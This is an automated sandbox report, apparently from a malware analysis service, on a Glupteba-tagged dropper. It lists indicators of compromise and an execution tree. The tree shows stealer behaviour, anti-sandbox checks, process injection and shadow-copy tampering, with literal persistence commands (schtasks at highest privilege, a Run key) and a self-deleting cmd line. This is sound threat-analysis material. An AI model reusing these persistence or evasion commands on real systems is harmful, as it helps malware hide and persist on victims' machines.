glupteba | fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UK51TetNQgokP7kDNvUpo1pU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UK51TetNQgokP7kDNvUpo1pU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Ug8wtqfslbJuPXx71pIsR45E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Ug8wtqfslbJuPXx71pIsR45E.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup.exe

Loads dropped DLL 7 IoCs

pid	Process
2824	Database.exe
3932	71WGDlrrCmE7NSqeAANnH5Tv.exe
3932	71WGDlrrCmE7NSqeAANnH5Tv.exe
2824	Database.exe
2824	Database.exe
2824	Database.exe
2824	Database.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral3/files/0x000100000001ab5e-156.dat	agile_net
behavioral3/files/0x000100000001ab5e-155.dat	agile_net

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral3/files/0x000100000001ab70-185.dat	themida
behavioral3/files/0x000100000001ab76-196.dat	themida
behavioral3/files/0x000100000001ab6d-162.dat	themida
behavioral3/files/0x000100000001ab70-139.dat	themida
behavioral3/files/0x000100000001ab76-149.dat	themida
behavioral3/memory/3828-247-0x0000000000A30000-0x0000000000A31000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	1787524.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UK51TetNQgokP7kDNvUpo1pU.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Ug8wtqfslbJuPXx71pIsR45E.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
120	ipinfo.io
459	geoiptool.com
30	ipinfo.io
31	ipinfo.io
112	ip-api.com

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3828	Ug8wtqfslbJuPXx71pIsR45E.exe

Suspicious use of SetThreadContext 51 IoCs

description	pid	Process	procid_target
PID 2756 set thread context of 5056	2756	XE4LwXbegOWMs0rNoCmfqLXT.exe	114
PID 2752 set thread context of 4960	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	111
PID 1036 set thread context of 5000	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	112
PID 3924 set thread context of 1900	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	130
PID 2752 set thread context of 3732	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	117
PID 1036 set thread context of 4500	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	115
PID 2752 set thread context of 3160	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	118
PID 3924 set thread context of 5020	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	119
PID 1036 set thread context of 3860	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	122
PID 2752 set thread context of 5076	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	123
PID 3924 set thread context of 4944	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	124
PID 1036 set thread context of 728	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	125
PID 2752 set thread context of 4120	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	133
PID 3924 set thread context of 4224	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	132
PID 1036 set thread context of 5104	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	134
PID 2752 set thread context of 5140	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	140
PID 1036 set thread context of 5324	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	143
PID 3924 set thread context of 5248	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	141
PID 1036 set thread context of 5568	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	148
PID 3924 set thread context of 5656	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	150
PID 2752 set thread context of 5920	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	156
PID 1036 set thread context of 5960	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	157
PID 3924 set thread context of 6056	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	158
PID 2752 set thread context of 5276	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	159
PID 3924 set thread context of 2120	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	176
PID 1036 set thread context of 4492	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	172
PID 2752 set thread context of 5376	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	196
PID 3924 set thread context of 6140	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	175
PID 1036 set thread context of 5356	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	182
PID 3924 set thread context of 5308	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	180
PID 2492 set thread context of 2216	2492	EI9Qr22bp_1ivjY7PGrVBdSi.exe	593
PID 1688 set thread context of 5384	1688	Bjo6YRQODt7AzHu9PtdXdaBw.exe	191
PID 2752 set thread context of 5364	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	184
PID 1036 set thread context of 5520	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	185
PID 2752 set thread context of 3196	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	194
PID 1036 set thread context of 2376	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	192
PID 3924 set thread context of 4768	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	195
PID 2752 set thread context of 2312	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	198
PID 1036 set thread context of 5460	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	197
PID 3924 set thread context of 4272	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	200
PID 2752 set thread context of 5432	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	203
PID 1036 set thread context of 4828	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	204
PID 3924 set thread context of 5584	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	207
PID 2752 set thread context of 6276	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	208
PID 3924 set thread context of 6480	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	211
PID 2752 set thread context of 6604	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	212
PID 1036 set thread context of 6592	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	213
PID 1036 set thread context of 6932	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	216
PID 3924 set thread context of 7132	3924	1Gx6iwl9XKt4ldRADfi44CSj.exe	223
PID 2752 set thread context of 4468	2752	_REgbQzZCXMoBI0Z4n2NiudF.exe	227
PID 1036 set thread context of 4648	1036	dXnjHNDOir5kHMbGzgfI6bCZ.exe	225

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	EulK0pOA6RMeInSXZSLeB9K5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	B6mQ5Cil2WKGthK1sbuJ8rQJ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	B6mQ5Cil2WKGthK1sbuJ8rQJ.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	EulK0pOA6RMeInSXZSLeB9K5.exe
File created	C:\Program Files (x86)\Company\NewProduct\d	md8_8eus.exe
File created	C:\Program Files (x86)\Company\NewProduct\tmp.edb	md8_8eus.exe
File created	C:\Program Files (x86)\Company\NewProduct\d.jfm	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\d.jfm	md8_8eus.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	B6mQ5Cil2WKGthK1sbuJ8rQJ.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	B6mQ5Cil2WKGthK1sbuJ8rQJ.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	B6mQ5Cil2WKGthK1sbuJ8rQJ.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 57 IoCs

pid	pid_target	Process	procid_target
4372	2732	WerFault.exe	89
4120	2732	WerFault.exe	89
548	2732	WerFault.exe	89
2248	3016	WerFault.exe	79
4652	2732	WerFault.exe	89
2868	3992	WerFault.exe	86
5268	2732	WerFault.exe	89
5240	3016	WerFault.exe	79
5400	3992	WerFault.exe	86
5664	3016	WerFault.exe	79
5876	3016	WerFault.exe	79
5884	3992	WerFault.exe	86
1836	3992	WerFault.exe	86
1360	3016	WerFault.exe	79
6064	3016	WerFault.exe	79
2312	2732	WerFault.exe	89
2376	5376	WerFault.exe	173
4104	2732	WerFault.exe	89
3976	3992	WerFault.exe	86
5376	3992	WerFault.exe	86
4568	2732	WerFault.exe	89
4972	3992	WerFault.exe	86
2344	2732	WerFault.exe	89
6388	3992	WerFault.exe	86
6988	6604	WerFault.exe	212
188	3992	WerFault.exe	86
6812	3992	WerFault.exe	86
8004	7632	WerFault.exe	273
4348	3992	WerFault.exe	86
4728	3992	WerFault.exe	86
7952	3992	WerFault.exe	86
2180	3992	WerFault.exe	86
7992	7676	WerFault.exe	287
5368	3992	WerFault.exe	86
2216	3992	WerFault.exe	86
4728	3992	WerFault.exe	86
7872	3992	WerFault.exe	86
5604	3992	WerFault.exe	86
6032	3992	WerFault.exe	86
4092	3992	WerFault.exe	86
6388	864	WerFault.exe	322
5072	7936	WerFault.exe	341
7976	3960	WerFault.exe	320
8076	3960	WerFault.exe	320
7936	3960	WerFault.exe	320
8384	3960	WerFault.exe	320
8760	3960	WerFault.exe	320
9192	3960	WerFault.exe	320
8788	3960	WerFault.exe	320
5188	3960	WerFault.exe	320
4700	4112	WerFault.exe	164
11368	8068	WerFault.exe	367
1232	8272	WerFault.exe	377
10236	8600	WerFault.exe	386
9512	6572	Process not Found	1554
31296	6752	Process not Found	1603
16040	1252	Process not Found	1640

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2593.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XE4LwXbegOWMs0rNoCmfqLXT.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XE4LwXbegOWMs0rNoCmfqLXT.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	XE4LwXbegOWMs0rNoCmfqLXT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2593.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2593.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	71WGDlrrCmE7NSqeAANnH5Tv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	71WGDlrrCmE7NSqeAANnH5Tv.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
3364	schtasks.exe
3212	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
8052	timeout.exe
6184	timeout.exe
8108	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
6216	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
5532	taskkill.exe
5892	taskkill.exe
4156	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	181	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
396	Setup.exe
396	Setup.exe
5056	XE4LwXbegOWMs0rNoCmfqLXT.exe
5056	XE4LwXbegOWMs0rNoCmfqLXT.exe
3032	Process not Found
3032	Process not Found
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
3032	Process not Found
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe
4372	WerFault.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5056	XE4LwXbegOWMs0rNoCmfqLXT.exe
5732	2593.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3928	ZTlAwK64wiN73TVoEcyoLy3O.exe
Token: SeDebugPrivilege	500	sZDQ61Rd3dP8tRnSCLfEJ2tk.exe
Token: SeDebugPrivilege	4020	_7Nq4AGvF3WDZCcffBJ1j2tc.exe
Token: SeRestorePrivilege	4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
Token: SeBackupPrivilege	4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
Token: SeDebugPrivilege	4120	_REgbQzZCXMoBI0Z4n2NiudF.exe
Token: SeDebugPrivilege	4372	WerFault.exe
Token: SeDebugPrivilege	2152	mAPe2sXRVHkCLW_xYwbgz8VR.exe
Token: SeDebugPrivilege	3828	Ug8wtqfslbJuPXx71pIsR45E.exe
Token: SeDebugPrivilege	548	WerFault.exe
Token: SeDebugPrivilege	2248	WerFault.exe
Token: SeDebugPrivilege	4652	WerFault.exe
Token: SeDebugPrivilege	5240	WerFault.exe
Token: SeDebugPrivilege	5268	3628559.exe
Token: SeDebugPrivilege	5664	_REgbQzZCXMoBI0Z4n2NiudF.exe
Token: SeDebugPrivilege	5876	1Gx6iwl9XKt4ldRADfi44CSj.exe
Token: SeDebugPrivilege	1360	WerFault.exe
Token: SeDebugPrivilege	4112	1725740.exe
Token: SeDebugPrivilege	5788	8871482.exe
Token: SeDebugPrivilege	6064	WerFault.exe
Token: SeDebugPrivilege	2312	_REgbQzZCXMoBI0Z4n2NiudF.exe
Token: SeDebugPrivilege	4104	WerFault.exe
Token: SeDebugPrivilege	2492	EI9Qr22bp_1ivjY7PGrVBdSi.exe
Token: SeDebugPrivilege	4568	WerFault.exe
Token: SeDebugPrivilege	2344	WerFault.exe
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeDebugPrivilege	5892	taskkill.exe
Token: SeDebugPrivilege	5384	Bjo6YRQODt7AzHu9PtdXdaBw.exe
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeManageVolumePrivilege	4832	md8_8eus.exe
Token: SeDebugPrivilege	4192	3488781.exe
Token: SeShutdownPrivilege	3032	Process not Found
Token: SeCreatePagefilePrivilege	3032	Process not Found
Token: SeDebugPrivilege	5268	3628559.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 396 wrote to memory of 2152	396	Setup.exe	82
PID 396 wrote to memory of 2152	396	Setup.exe	82
PID 396 wrote to memory of 2152	396	Setup.exe	82
PID 396 wrote to memory of 3828	396	Setup.exe	94
PID 396 wrote to memory of 3828	396	Setup.exe	94
PID 396 wrote to memory of 3828	396	Setup.exe	94
PID 396 wrote to memory of 4020	396	Setup.exe	91
PID 396 wrote to memory of 4020	396	Setup.exe	91
PID 396 wrote to memory of 3924	396	Setup.exe	96
PID 396 wrote to memory of 3924	396	Setup.exe	96
PID 396 wrote to memory of 3924	396	Setup.exe	96
PID 396 wrote to memory of 2756	396	Setup.exe	81
PID 396 wrote to memory of 2756	396	Setup.exe	81
PID 396 wrote to memory of 2756	396	Setup.exe	81
PID 396 wrote to memory of 3020	396	Setup.exe	93
PID 396 wrote to memory of 3020	396	Setup.exe	93
PID 396 wrote to memory of 3020	396	Setup.exe	93
PID 396 wrote to memory of 3016	396	Setup.exe	79
PID 396 wrote to memory of 3016	396	Setup.exe	79
PID 396 wrote to memory of 3016	396	Setup.exe	79
PID 396 wrote to memory of 3424	396	Setup.exe	92
PID 396 wrote to memory of 3424	396	Setup.exe	92
PID 396 wrote to memory of 3424	396	Setup.exe	92
PID 396 wrote to memory of 3928	396	Setup.exe	84
PID 396 wrote to memory of 3928	396	Setup.exe	84
PID 396 wrote to memory of 1688	396	Setup.exe	85
PID 396 wrote to memory of 2824	396	Setup.exe	78
PID 396 wrote to memory of 1688	396	Setup.exe	85
PID 396 wrote to memory of 1688	396	Setup.exe	85
PID 396 wrote to memory of 2824	396	Setup.exe	78
PID 396 wrote to memory of 2824	396	Setup.exe	78
PID 396 wrote to memory of 3992	396	Setup.exe	86
PID 396 wrote to memory of 3992	396	Setup.exe	86
PID 396 wrote to memory of 3992	396	Setup.exe	86
PID 396 wrote to memory of 588	396	Setup.exe	98
PID 396 wrote to memory of 588	396	Setup.exe	98
PID 396 wrote to memory of 588	396	Setup.exe	98
PID 396 wrote to memory of 1036	396	Setup.exe	99
PID 396 wrote to memory of 1036	396	Setup.exe	99
PID 396 wrote to memory of 1036	396	Setup.exe	99
PID 396 wrote to memory of 420	396	Setup.exe	97
PID 396 wrote to memory of 420	396	Setup.exe	97
PID 396 wrote to memory of 420	396	Setup.exe	97
PID 396 wrote to memory of 3932	396	Setup.exe	95
PID 396 wrote to memory of 3932	396	Setup.exe	95
PID 396 wrote to memory of 3932	396	Setup.exe	95
PID 396 wrote to memory of 4092	396	Setup.exe	80
PID 396 wrote to memory of 4092	396	Setup.exe	80
PID 396 wrote to memory of 4092	396	Setup.exe	80
PID 396 wrote to memory of 2752	396	Setup.exe	90
PID 396 wrote to memory of 2752	396	Setup.exe	90
PID 396 wrote to memory of 2752	396	Setup.exe	90
PID 396 wrote to memory of 500	396	Setup.exe	83
PID 396 wrote to memory of 500	396	Setup.exe	83
PID 396 wrote to memory of 2732	396	Setup.exe	89
PID 396 wrote to memory of 2732	396	Setup.exe	89
PID 396 wrote to memory of 2732	396	Setup.exe	89
PID 396 wrote to memory of 2492	396	Setup.exe	88
PID 396 wrote to memory of 2492	396	Setup.exe	88
PID 396 wrote to memory of 2492	396	Setup.exe	88
PID 396 wrote to memory of 2396	396	Setup.exe	87
PID 396 wrote to memory of 2396	396	Setup.exe	87
PID 396 wrote to memory of 2396	396	Setup.exe	87
PID 396 wrote to memory of 3776	396	Setup.exe	107

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:396
- C:\Users\Admin\Documents\R_GswvyriTEQcLwPMNh2VKYE.exe
  "C:\Users\Admin\Documents\R_GswvyriTEQcLwPMNh2VKYE.exe"
  2⤵
  - Executes dropped EXE
  PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\R_GswvyriTEQcLwPMNh2VKYE.exe"
    3⤵
    PID:6916
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /T 10 /NOBREAK
      4⤵
      Delays execution with timeout.exe
      PID:6184
- C:\Users\Admin\Documents\Xe2n1RvRqA9aPMSn6M5Xpld2.exe
  "C:\Users\Admin\Documents\Xe2n1RvRqA9aPMSn6M5Xpld2.exe"
  2⤵
  - Executes dropped EXE
  PID:3016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 660
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:2248
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 676
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5240
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 680
    3⤵
    - Program crash
    PID:5664
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 684
    3⤵
    - Program crash
    PID:5876
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 892
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 1080
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:6064
- C:\Users\Admin\Documents\EulK0pOA6RMeInSXZSLeB9K5.exe
  "C:\Users\Admin\Documents\EulK0pOA6RMeInSXZSLeB9K5.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:4092
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3212
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3364
- C:\Users\Admin\Documents\XE4LwXbegOWMs0rNoCmfqLXT.exe
  "C:\Users\Admin\Documents\XE4LwXbegOWMs0rNoCmfqLXT.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2756
- - C:\Users\Admin\Documents\XE4LwXbegOWMs0rNoCmfqLXT.exe
    "C:\Users\Admin\Documents\XE4LwXbegOWMs0rNoCmfqLXT.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:5056
- C:\Users\Admin\Documents\mAPe2sXRVHkCLW_xYwbgz8VR.exe
  "C:\Users\Admin\Documents\mAPe2sXRVHkCLW_xYwbgz8VR.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2152
- C:\Users\Admin\Documents\sZDQ61Rd3dP8tRnSCLfEJ2tk.exe
  "C:\Users\Admin\Documents\sZDQ61Rd3dP8tRnSCLfEJ2tk.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:500
- - C:\Users\Admin\AppData\Roaming\1725740.exe
    "C:\Users\Admin\AppData\Roaming\1725740.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4112
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4112 -s 1764
      4⤵
      Program crash
      PID:4700
- - C:\Users\Admin\AppData\Roaming\1787524.exe
    "C:\Users\Admin\AppData\Roaming\1787524.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:4564
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:2608
- - C:\Users\Admin\AppData\Roaming\3488781.exe
    "C:\Users\Admin\AppData\Roaming\3488781.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4192
- - C:\Users\Admin\AppData\Roaming\3628559.exe
    "C:\Users\Admin\AppData\Roaming\3628559.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5268
- - C:\Users\Admin\AppData\Roaming\8871482.exe
    "C:\Users\Admin\AppData\Roaming\8871482.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5788
- C:\Users\Admin\Documents\ZTlAwK64wiN73TVoEcyoLy3O.exe
  "C:\Users\Admin\Documents\ZTlAwK64wiN73TVoEcyoLy3O.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3928
- - C:\Users\Admin\AppData\Local\Temp\ryuk.exe
    "C:\Users\Admin\AppData\Local\Temp\ryuk.exe"
    3⤵
    PID:5732
